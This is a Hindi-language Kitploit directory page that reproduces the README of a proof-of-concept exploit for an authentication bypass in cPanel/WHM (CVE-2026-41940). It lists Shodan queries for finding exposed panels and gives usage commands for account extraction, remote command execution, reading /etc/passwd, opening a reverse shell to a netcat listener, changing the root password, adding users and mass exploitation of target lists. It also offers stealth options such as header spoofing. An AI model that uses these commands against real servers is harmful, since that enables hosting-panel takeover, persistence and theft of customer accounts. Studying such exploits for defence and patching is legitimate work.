Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-41940-PoC-Exploit — 🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - सर्वश्रेष्ठ प्रवाह 💥 CRLF इंजेक्शन से प्रमाणीकरण बाईपास, सत्र अपहरण और खाता लीक होता है। ✅ प्रॉक्सी, कस्टम UA, कीप-अलाइव, पुनःप्रयास, SSL सत्यापन, रंगीन आउटपुट, फ़ाइल सहेजने का समर्थन। ⚡ पेंटेस्टर्स के लिए उन्नत PoC. | Kitploit
उपकरण/GitHubGitHub/tc4dy/cve-2026-41940-poc-exploit
प्रमाणीकरण और प्राधिकरणविशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापोस्ट-शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रेड टीमिंग
पेलोड डेवलपमेंट
GitHubtc4dy/cve-2026-41940-poc-exploit

CVE-2026-41940-PoC-Exploit

🚀 CVE-2026-41940 cPanel/WHM Auth Bypass Exploit - सर्वश्रेष्ठ प्रवाह 💥 CRLF इंजेक्शन से प्रमाणीकरण बाईपास, सत्र अपहरण और खाता लीक होता है। ✅ प्रॉक्सी, कस्टम UA, कीप-अलाइव, पुनःप्रयास, SSL सत्यापन, रंगीन आउटपुट, फ़ाइल सहेजने का समर्थन। ⚡ पेंटेस्टर्स के लिए उन्नत PoC.

रिपॉजिटरी देखें
9281 महीना पहलेअभी तक समीक्षित नहीं

CVE-2026-41940

🚀 CVE-2026-41940 - cPanel/WHM प्रमाणीकरण बायपास एक्सप्लॉइट

Python License CVSS Pentesting

cPanel & WHM Edition - CRLF इंजेक्शन से प्रमाणीकरण बायपास और पूर्ण सत्र अपहरण

📌 अवलोकन

यह एक्सप्लॉइट CVE-2026-41940 का उपयोग करता है, जो cPanel/WHM में एक गंभीर प्रमाणीकरण बायपास कमजोरी है। सत्र प्रबंधन प्रणाली में एक निर्मित CRLF पेलोड इंजेक्ट करके, यह बिना किसी वैध क्रेडेंशियल के सत्र अपहरण, रूट एक्सेस और होस्टिंग पैनल पर पूर्ण नियंत्रण प्राप्त करता है।

🔥 मुख्य विशेषताएं

🎯 कमजोर संस्करण

📍 Shodan खोज

root@kitploit:~
port:2087 "cPanel" "WHM"
port:2083 "cPanel"

⚠️ अस्वीकरण: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। अनधिकृत पहुंच अवैध है।

📦 स्थापना

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41940-POC-Exploit
cd CVE-2026-41940-POC-Exploit

# Install dependencies
pip3 install -r requirements.txt

# Run
python3 exploit.py -t https://example.com:2087

🛠️ उपयोग उदाहरण

root@kitploit:~
# Basic exploitation (extract accounts)
python3 exploit.py -t https://192.168.1.100:2087

# Save accounts to file
python3 exploit.py -t https://192.168.1.100:2087 -o accounts.txt

# Verbose mode (debug output)
python3 exploit.py -t https://192.168.1.100:2087 -v

# Interactive WHM Shell (Recommended)
python3 exploit.py -t https://192.168.1.100:2087 -i

💻 इंटरैक्टिव शेल कमांड

root@kitploit:~
[email protected] $ accounts          # List all cPanel accounts
[email protected] $ version           # Show cPanel version
[email protected] $ ls /home          # List directory
[email protected] $ cat /etc/passwd   # Read file
[email protected] $ exec id           # Execute command
[email protected] $ passwd NewPass123 # Change root password
[email protected] $ adduser test test.com pass123  # Create new user
[email protected] $ exit              # Exit shell

## 🔧 दूरस्थ कमांड निष्पादन

```bash
# Execute single command
python3 exploit.py -t https://192.168.1.100:2087 --cmd "id"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "cat /etc/passwd"
python3 exploit.py -t https://192.168.1.100:2087 --cmd "whoami; hostname; uname -a"


# Read file
python3 exploit.py -t https://192.168.1.100:2087 --read /etc/passwd
python3 exploit.py -t https://192.168.1.100:2087 --read /home/example/config.php

🌐 रिवर्स शेल

root@kitploit:~
# Attacker machine (listener)
nc -lvnp 4444

# Exploit (reverse shell)
python3 exploit.py -t https://192.168.1.100:2087 --reverse-shell 10.0.0.1:4444

🔐 पोस्ट-शोषण संचालन

root@kitploit:~
# Change root password
python3 exploit.py -t https://192.168.1.100:2087 --passwd "NewRootPass123!"

# Create new cPanel user
python3 exploit.py -t https://192.168.1.100:2087 --adduser hacker hacker.com Pass1234

# Keep-alive session (maintain access)
python3 exploit.py -t https://192.168.1.100:2087 --no-keep-alive  # Disable auto keep-alive

📊 सामूहिक शोषण (बहु-लक्ष्य)

root@kitploit:~
# Create targets file
echo "https://target1.com:2087" > targets.txt
echo "https://target2.com:2087" >> targets.txt
echo "https://10.0.0.5:2087" >> targets.txt

# Mass exploit with 20 threads
python3 exploit.py -l targets.txt --threads 20

# Mass exploit with command execution
python3 exploit.py -l targets.txt --threads 10 --cmd "id"

⚙️ उन्नत विकल्प

root@kitploit:~
# Custom port (non-standard)
python3 exploit.py -t https://example.com -p 8443

# Using proxy
python3 exploit.py -t https://192.168.1.100:2087 --proxy http://127.0.0.1:8080

# Custom user-agent for stealth
python3 exploit.py -t https://192.168.1.100:2087 -ua "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"

# Custom delay and retries
python3 exploit.py -t https://192.168.1.100:2087 --delay 5 --max-retries 5

# SSL verification (ignore self-signed by default)
python3 exploit.py -t https://192.168.1.100:2087 --ssl-verify

📊 कमांड लाइन तर्क

🧪 परीक्षण वातावरण

Docker (if you want to test safely)

docker run -d --name cpanel-test -p 2087:2087 cpanel/cpanel:102

Or with vulnerable version

docker pull cpanel/cpanel:11.102 docker run -d -p 2087:2087 cpanel/cpanel:11.102

🔗 संबंधित एक्सप्लॉइट

मेरे अन्य एक्सप्लॉइट रिपॉजिटरी देखें:

  • CVE-2026-24061
  • CVE-2026-0073
  • CVE-2026-29000
टूल डाउनलोड करें
श्रेणीविशेषताएं
शोषण✅ CRLF इंजेक्शन के माध्यम से प्रमाणीकरण बायपास
✅ WHM सत्र अपहरण
✅ सुरक्षा टोकन रिसाव
✅ तत्काल रूट एक्सेस
पोस्ट-शोषण✅ खाता सूची निष्कर्षण (उपयोगकर्ता + डोमेन)
✅ दूरस्थ कमांड निष्पादन (RCE)
✅ रिवर्स शेल (netcat संगत)
✅ फ़ाइल पढ़ना (कॉन्फ़िग, लॉग, आदि)
✅ रूट पासवर्ड बदलें
✅ नया cPanel उपयोगकर्ता बनाएं
स्कैनिंग✅ एकल लक्ष्य शोषण
✅ बहु-लक्ष्य सामूहिक स्कैन
✅ मल्टी-थ्रेडिंग (कॉन्फ़िगरेबल थ्रेड्स)
✅ पोर्ट ओवरराइड समर्थन
गुप्तता✅ अनुरोधों के बीच यादृच्छिक विलंब
✅ X-Forwarded-For स्पूफिंग
✅ कस्टम User-Agent समर्थन
✅ प्रॉक्सी समर्थन (HTTP/HTTPS)
उपयोगिता✅ इंटरैक्टिव WHM शेल (-i)
✅ रंगीन आउटपुट (colorama)
✅ वर्बोज़/डीबग मोड
✅ फ़ाइल में खाता सूची निर्यात
✅ Keep-Alive सत्र थ्रेड
✅ अस्थिर कनेक्शनों के लिए पुनः प्रयास तंत्र
उत्पादसंस्करणस्थिति
cPanel & WHM11.92 - 11.102✅ पुष्टि
cPanel & WHM11.104 - 11.110✅ पुष्टि
cPanel & WHM11.118 - 11.136⚠️ सीमित
cPanel & WHM< 11.86✅ संभवतः कमजोर
छोटालंबाविवरणडिफ़ॉल्ट
-t--targetएकल लक्ष्य URLआवश्यक (एकल)
-l--target-fileलक्ष्य सूची वाली फ़ाइलआवश्यक (सामूहिक)
-p--portपोर्ट ओवरराइड करेंस्वतः पता लगाएं
-o--outputखाता सूची फ़ाइल में सहेजेंकोई नहीं
-v--verboseडीबग आउटपुट सक्षम करेंगलत
-i--interactiveइंटरैक्टिव WHM शेलगलत
--proxyHTTP/HTTPS प्रॉक्सीकोई नहीं
-ua--user-agentकस्टम User-Agentयादृच्छिक
--cmdएकल कमांड निष्पादित करेंकोई नहीं
--reverse-shellरिवर्स शेल IP:PORTकोई नहीं
--passwdरूट पासवर्ड बदलेंकोई नहीं
--adduserनया उपयोगकर्ता बनाएं (USER DOMAIN PASS)कोई नहीं
--readलक्ष्य से फ़ाइल पढ़ेंकोई नहीं
--threadsसामूहिक स्कैन के लिए थ्रेड10
--delayKeep-alive अंतराल (सेकंड)3.0
--max-retriesप्रति अनुरोध अधिकतम पुनः प्रयास3
--no-keep-aliveसत्र बनाए न रखेंगलत
--ssl-verifySSL प्रमाणपत्र सत्यापित करेंगलत